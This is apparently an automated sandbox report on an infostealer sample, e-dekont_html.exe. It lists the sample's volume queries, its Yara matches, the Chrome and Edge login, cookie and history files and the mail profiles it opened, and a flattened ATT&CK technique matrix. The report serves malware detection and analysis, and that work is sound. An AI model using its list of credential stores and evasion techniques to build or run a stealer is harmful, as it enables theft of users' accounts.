                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3785666315.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                Logon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS111
                Security Software Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets1
                Process Discovery
                SSH1
                Input Capture
                14
